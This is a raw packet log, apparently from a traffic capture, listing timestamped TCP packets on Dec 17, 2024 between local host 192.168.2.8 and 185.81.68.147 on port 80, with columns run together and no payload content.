                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087733984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087763071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087831020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087923050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087934017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.087975979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.088319063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.088453054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089298964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089413881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089488029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089488029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.089488029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.090233088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.090372086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091178894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091257095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091325045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.091325045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.092144012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.092252016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.092818022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.093107939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.093367100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.093951941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.094064951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.094145060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.094331026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.095021009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.095082045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.095333099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.277848959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.278704882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.278717041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.278912067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.279566050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.279999971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.280594110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.280647993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.280719042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.281039000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.281577110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.281651020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.282448053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.282449961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.282672882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.283164024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.283802986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.283910990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284281015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284444094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284610987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284912109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.285301924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.286360979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.286396027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.286406040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287167072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287280083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287329912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287345886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.288109064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.288316965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.289139032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.289356947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290043116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290047884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290148020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290335894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291222095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291254044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291333914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291333914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291960001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.292041063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.292968988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.293082952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.293109894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.293883085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.294281006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.294845104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.294991970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295331955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295331955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295332909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295723915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295866013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.296046972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.296665907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.296821117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.297768116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.297868967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.297956944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.298033953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.298717976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.298939943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.299335957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.299562931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.299631119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.300476074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.300594091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.300602913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.301470041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.301587105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302365065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302448988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302989960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302989960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.303384066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.303523064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304008007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304008007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304438114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304546118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.305273056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.306046963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.363666058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.447453022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.447586060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.447901011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448050976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448072910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448359966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448882103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449006081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449117899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449851036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449872017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.450391054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.491826057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.491955996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.492688894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.492746115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.492924929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.493613005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.493695974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.493988991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.494613886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.494795084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.495053053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.495595932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.495733976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.496047974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.496448994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.496613026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.497272015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.497369051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.551985025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.639605045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.639667034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640042067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640074968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640140057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640260935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641033888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641201973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641377926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641994953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.642147064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.642498016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.642993927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.643104076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.643362999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.644123077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.644380093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645282984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645330906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645401955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645401955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.646156073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.646286964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.646399975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647015095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647241116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647335052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647932053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648015976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648258924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648605108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648744106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648950100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.649786949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.649840117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.650537968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.650670052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.651134968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.651500940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.651663065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652435064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652468920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652468920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652534008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.653393030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.653464079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.653512955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.654367924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.654459953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.654593945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.655359030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.655400038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.655430079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656256914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656317949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656327963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656470060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.657253027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.657275915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.657393932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.658147097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.658260107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.658389091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.659105062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.659225941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.659352064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660065889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660182953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660650015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660995007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.661185980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.661710024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.661979914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.662081003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.662640095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.662910938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.663031101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.663100958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.663842916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.846415997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.846478939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.846592903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.847378969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.847560883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848308086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848371983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848406076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848536968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.849275112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.849349022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.849446058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.850205898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.850261927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.850693941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.851169109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.851247072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.851336956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.852119923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.852243900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.852327108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.853082895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.853209972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.853446007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.854033947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.854171991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.854285002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855101109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855166912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855320930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855979919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856098890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856177092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856910944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856966972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.857165098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.857846975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.857903004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.858134031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.858786106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.858900070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859731913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859827995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859848022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859899044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.860690117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.860810041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.860877037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.861649990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.861759901 CET8049709185.81.68.147192.168.2.8
